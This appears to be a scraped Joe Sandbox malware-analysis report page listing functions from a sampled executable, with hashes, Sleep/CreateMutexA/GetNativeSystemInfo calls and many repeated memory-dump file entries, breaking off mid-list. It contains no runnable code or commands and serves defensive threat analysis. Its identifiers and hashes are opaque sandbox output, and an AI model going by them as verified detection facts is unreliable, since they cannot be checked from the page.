Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_850000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5691b5d508a0f62e716634893afb66674466b3d8a64952f89d1dd4dff4fc8933
Instruction ID: c1ab48c45014f37f03df146f4ab3ae8ddc628e37879242382eae0086a9a7f1ab
Opcode Fuzzy Hash: 5691b5d508a0f62e716634893afb66674466b3d8a64952f89d1dd4dff4fc8933
Instruction Fuzzy Hash: 2C311931B001049BEB0C9BBCD8CDBAEB762FB91315F244319E414D72D5D7B559848757

Function 0085A54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0085A963
CreateMutexA.KERNEL32(00000000,00000000,008B3254), ref: 0085A981

Memory Dump Source

Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true

Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_850000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 83db5ad967c2a4d9213b1299bf178d18ba4695c044a7eeddf20258d581df72c7
Instruction ID: 92a484ef3ecb481b15386407a2d59acce7604ad13fc4a487ae4926eb0448bf3b
Opcode Fuzzy Hash: 83db5ad967c2a4d9213b1299bf178d18ba4695c044a7eeddf20258d581df72c7
Instruction Fuzzy Hash: 9831F571B002049BEB0C9BB8D8C9BADBB62FB95316F244718E814E72D5D77599888713

Function 0085A682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0085A963
CreateMutexA.KERNEL32(00000000,00000000,008B3254), ref: 0085A981

Memory Dump Source

Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true

Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_850000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: c134381366a59a354da9afc656b6e5cb3148c3dbdff419c93bd73f6cac54055f
Instruction ID: 3043f3b33834c81245006e17d6b051c4d1be5299093176c4966ae98e645e55e6
Opcode Fuzzy Hash: c134381366a59a354da9afc656b6e5cb3148c3dbdff419c93bd73f6cac54055f
Instruction Fuzzy Hash: CE3107317042049BEB0C9B78DCC9BAEBBA2FB95312F248718E814E72D5C77599888753

Function 00859ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0085A963
CreateMutexA.KERNEL32(00000000,00000000,008B3254), ref: 0085A981

Memory Dump Source

Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true

Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_850000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: b727a5b048e34d3bd21b7e9f62eb55032b15a904f5462b1d4aa02b91404757f1
Instruction ID: a2164093438e7073242a818552af9e26ede524fc0021f6bfd0e541d802f86eb5
Opcode Fuzzy Hash: b727a5b048e34d3bd21b7e9f62eb55032b15a904f5462b1d4aa02b91404757f1
Instruction Fuzzy Hash: 6C213731704204DBFB189B6CECC9BADB762FBD1312F204319E818D73D5D7769A848612

Function 0085A856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0085A963
CreateMutexA.KERNEL32(00000000,00000000,008B3254), ref: 0085A981

Memory Dump Source

Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true

Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_850000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 28869d976403fe70abd68e51a7e2c59ff01d4b47052f0d997bc630083a647317
Instruction ID: a06f3aac0c601994645727362b67065860fdd92375430eb5982eb669a1fd76f3
Opcode Fuzzy Hash: 28869d976403fe70abd68e51a7e2c59ff01d4b47052f0d997bc630083a647317
Instruction Fuzzy Hash: 14217F31345204DBFB2C676CD8DA77EB762FF81302F244A26ED04D63C1CA7A49488153

Function 0085A34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0085A963
CreateMutexA.KERNEL32(00000000,00000000,008B3254), ref: 0085A981

Memory Dump Source

Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true

Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_850000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ad0a0c2184605c6bdb6b29fda6ae94dc5c18fae0a272187419eb2a3b301f7e44
Instruction ID: f105b2991882e786a2ae8e581292eb50033b531b4629166dd27d13ed66190094
Opcode Fuzzy Hash: ad0a0c2184605c6bdb6b29fda6ae94dc5c18fae0a272187419eb2a3b301f7e44
Instruction Fuzzy Hash: FC2145317042049BFB0C9B68E8C97AEBB62FBD1316F244319E814D77D0C7769A888253

Function 00857D30 Relevance: 1.9, APIs: 1, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00857ED3

Memory Dump Source

Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true

Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
